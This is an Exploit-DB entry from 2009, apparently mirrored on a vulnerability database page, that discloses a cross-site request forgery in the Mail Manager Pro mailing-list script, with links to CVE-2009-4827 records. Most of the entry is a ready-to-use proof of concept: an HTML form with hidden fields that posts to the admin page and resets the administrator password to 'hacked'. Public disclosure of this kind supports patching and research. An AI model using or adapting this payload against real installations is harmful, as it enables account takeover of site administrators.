Lucene search
Milos ZivanovicEDB-ID:10433HistoryDec 14, 2009 - 12:00 a.m.
Mail Manager Pro - Cross-Site Request Forgery (Change Admin Password)
2009-12-1400:00:00
Milos Zivanovic
www.exploit-db.com
32
AI Score
7.4
Confidence
Low
[#-----------------------------------------------------------------------------------------------#]
[#] Title: Mail Manager Pro XSRF (Change Admin Password)
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail.com
[#] Date: 14. December 2009.
[#] Application: Mail Manager Pro
[#] Version: the only one there is
[#] Link: http://www.scriptsez.net/?action=details&cat=Mailing%20List%20Managers&id=1192650742
[#] Price: 15 USD
[#] Vulnerability: Cross Site Request Forgery
[#-----------------------------------------------------------------------------------------------#]
With this exploit we can remotely change admins password.
[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/mmp/admin.php?action=change&mode=verify"
method="post">
<input type="hidden" name="admin_id" value="admin">
<input type="hidden" name="admin_email" value="[email protected]">
<input type="hidden" name="company" value="My Company">
<input type="hidden" name="admin_pass" value="hacked">
<input type="hidden" name="cpass" value="hacked">
<input type="submit" name="submit" value="Change">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]
[#] EOFRelated
prion
prion
Cross site request forgery (csrf)
2010-04-27 15:30:00
cvelist
cvelist
CVE-2009-4827
2010-04-27 15:00:00
nvd
nvd
CVE-2009-4827
2010-04-27 15:30:01
cve
cve
CVE-2009-4827
2010-04-27 15:30:01